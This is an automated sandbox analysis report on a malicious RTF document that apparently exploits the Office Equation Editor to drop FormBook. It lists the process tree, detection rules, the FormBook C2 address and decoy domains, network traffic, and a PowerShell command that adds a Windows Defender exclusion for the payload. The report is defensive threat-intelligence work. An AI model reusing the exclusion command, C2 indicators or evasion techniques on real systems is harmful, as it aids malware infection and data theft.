Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
na.doc

Overview

General Information

Sample name:na.doc
Analysis ID:1545184
MD5:1e6c06ed300dd4d6744f43efd6cc36a2
SHA1:8aaece78eaab5c434c8b9a88a1b154a09f800d16
SHA256:dbde17546d423c444465c7f4bbecd593e99c4d43136269bb7f1f3be544d716eb
Tags:docuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3484 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3568 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • ihbgfbin.exe (PID: 3736 cmdline: "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: 6A39668F48A502DBFA3CC13C7F463281)
        • powershell.exe (PID: 3816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • ihbgfbin.exe (PID: 3824 cmdline: "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: 6A39668F48A502DBFA3CC13C7F463281)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • mstsc.exe (PID: 3948 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
              • cmd.exe (PID: 3972 cmdline: /c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
    • EQNEDT32.EXE (PID: 4048 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lifeofthobes.uk/btrd/"], "decoy": ["toulouse.gold", "launchyouglobal.com", "margarita-services.com", "dasnail.club", "casa-hilo.com", "hardscapesofflorida.com", "thepositivitypulse.com", "kkmyanev.cfd", "love6ace22.top", "castorcruise.com", "chch6.com", "h59f07jy.cfd", "saatvikteerthyatra.com", "fxsecuretrading-option.com", "mostbet-k1o.click", "36-m.beauty", "ko-or-a-news.com", "eurekatextile.com", "gynlkj.com", "deepsouthcraftsman.com", "bougiebossbabe.com", "202402.xyz", "thecareskin.com", "zimmerli.online", "bathroomconnectsupreme.com", "opmk.monster", "docemimocasamentos.com", "mywayinist.com", "healthyters.com", "mozartchamberorchestra.sydney", "wewillrock.club", "education2jobs.com", "everlastdisposal.com", "valentinascrochet.com", "stewartvaluation.net", "blackphoenix01.xyz", "omnikart.shop", "jejeesclothing.com", "allurepet.site", "futureofaustin.com", "sillylittlestory.com", "inthewoodsdesigns.com", "freshtraining.store", "illuminati4me.com", "jewishlakecounty.com", "devadecoration.com", "nashexshop.com", "martline.website", "affirmationtotebags.com", "golifestyles.com", "telegood.info", "trygenesisx.com", "bestwhitetee.com", "delicatemayhem.com", "redyardcom.com", "solarcyborg.com", "emotieloos.com", "fanatics-international.com", "ballonsmagiques.com", "projektincognito.com", "fcno30.com", "horizonoutdoorservices.com", "couturewrap.com", "mbbwa4wp.cfd"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
na.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x69fbf:$obj2: \objdata
  • 0x69fd9:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Diceloader_15eeb7b9unknownunknown
  • 0x2b9:$a1: E9 92 9D FF FF C3 E8
0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Diceloader_15eeb7b9unknownunknown
      • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
      0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.ihbgfbin.exe.400000.0.unpackWindows_Trojan_Diceloader_15eeb7b9unknownunknown
      • 0x1e4b9:$a1: E9 92 9D FF FF C3 E8

      Sigma Signatures

      Exploits

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.120.84.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3568, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe

      System Summary

      barindex
      Sigma detected: Equation Editor Network Connection
      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3568, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80
      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ParentImage: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentProcessId: 3736, ParentProcessName: ihbgfbin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3816, ProcessName: powershell.exe
      Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
      Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ihbgfbin.exe, NewProcessName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3568, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3736, ProcessName: ihbgfbin.exe
      Sigma detected: Suspicious Microsoft Office Child Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ihbgfbin.exe, NewProcessName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3568, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3736, ProcessName: ihbgfbin.exe
      Sigma detected: Powershell Defender Exclusion
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ParentImage: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentProcessId: 3736, ParentProcessName: ihbgfbin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3816, ProcessName: powershell.exe
      Sigma detected: Modification of IE Registry Settings
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3568, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ParentImage: C:\Users\user\AppData\Roaming\ihbgfbin.exe, ParentProcessId: 3736, ParentProcessName: ihbgfbin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe", ProcessId: 3816, ProcessName: powershell.exe
      Sigma detected: Office Macro File Creation
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3484, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3816, TargetFilename: C:\Users\user\AppData\Local\Temp\zfjdguxk.xia.ps1

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-30T08:38:51.849816+010020314531Malware Command and Control Activity Detected192.168.2.224916413.248.213.4580TCP
      2024-10-30T08:40:34.568080+010020314531Malware Command and Control Activity Detected192.168.2.224916568.66.226.11780TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-30T08:37:29.702583+010020220501A Network Trojan was detected87.120.84.3880192.168.2.2249163TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-30T08:37:30.054009+010020220511A Network Trojan was detected87.120.84.3880192.168.2.2249163TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-30T08:37:30.054009+010028274491Attempted User Privilege Gain87.120.84.3880192.168.2.2249163TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: na.docAvira: detected
      Found malware configuration
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lifeofthobes.uk/btrd/"], "decoy": ["toulouse.gold", "launchyouglobal.com", "margarita-services.com", "dasnail.club", "casa-hilo.com", "hardscapesofflorida.com", "thepositivitypulse.com", "kkmyanev.cfd", "love6ace22.top", "castorcruise.com", "chch6.com", "h59f07jy.cfd", "saatvikteerthyatra.com", "fxsecuretrading-option.com", "mostbet-k1o.click", "36-m.beauty", "ko-or-a-news.com", "eurekatextile.com", "gynlkj.com", "deepsouthcraftsman.com", "bougiebossbabe.com", "202402.xyz", "thecareskin.com", "zimmerli.online", "bathroomconnectsupreme.com", "opmk.monster", "docemimocasamentos.com", "mywayinist.com", "healthyters.com", "mozartchamberorchestra.sydney", "wewillrock.club", "education2jobs.com", "everlastdisposal.com", "valentinascrochet.com", "stewartvaluation.net", "blackphoenix01.xyz", "omnikart.shop", "jejeesclothing.com", "allurepet.site", "futureofaustin.com", "sillylittlestory.com", "inthewoodsdesigns.com", "freshtraining.store", "illuminati4me.com", "jewishlakecounty.com", "devadecoration.com", "nashexshop.com", "martline.website", "affirmationtotebags.com", "golifestyles.com", "telegood.info", "trygenesisx.com", "bestwhitetee.com", "delicatemayhem.com", "redyardcom.com", "solarcyborg.com", "emotieloos.com", "fanatics-international.com", "ballonsmagiques.com", "projektincognito.com", "fcno30.com", "horizonoutdoorservices.com", "couturewrap.com", "mbbwa4wp.cfd"]}
      Multi AV Scanner detection for submitted file
      Source: na.docReversingLabs: Detection: 39%
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exeJoe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009640B9 CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError,10_2_009640B9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009569BE memset,CryptSignMessage,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain,10_2_009569BE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009579B8 CryptMsgOpenToDecode,GetLastError,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,GetLastError,CertOpenStore,CryptMsgClose,10_2_009579B8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00957135 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore,10_2_00957135
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00963AD1 CryptProtectData,LocalAlloc,memcpy,LocalFree,10_2_00963AD1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0094D3DF CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,10_2_0094D3DF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00963C77 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,10_2_00963C77
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00963DD8 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,10_2_00963DD8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009435FC memset,CryptUIDlgViewCertificateW,GetLastError,10_2_009435FC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0094D561 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,10_2_0094D561
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_00963F45 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,10_2_00963F45

      Exploits

      barindex
      Office equation editor establishes network connection
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.120.84.38 Port: 80Jump to behavior
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ihbgfbin.exeJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wntdll.pdb source: ihbgfbin.exe, ihbgfbin.exe, 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000003.429889200.0000000002100000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002410000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000003.429589348.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mstsc.pdb source: ihbgfbin.exe, 00000007.00000002.429868517.0000000002770000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_009420E2 PathFindFileNameW,PathAppendW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,FindNextFileW,PathAppendW,FindNextFileW,FindClose,10_2_009420E2

      Software Vulnerabilities

      barindex
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop esi10_2_000972F9
      Source: global trafficDNS query: name: www.education2jobs.com
      Source: global trafficDNS query: name: www.lifeofthobes.uk
      Source: global trafficDNS query: name: www.thecareskin.com
      Source: global trafficDNS query: name: www.opmk.monster
      Source: global trafficDNS query: name: www.affirmationtotebags.com
      Source: global trafficDNS query: name: www.mbbwa4wp.cfd
      Source: global trafficDNS query: name: www.fcno30.com
      Source: global trafficDNS query: name: www.ko-or-a-news.com
      Source: global trafficDNS query: name: www.launchyouglobal.com
      Source: global trafficDNS query: name: www.trygenesisx.com
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 13.248.213.45:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 68.66.226.117:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
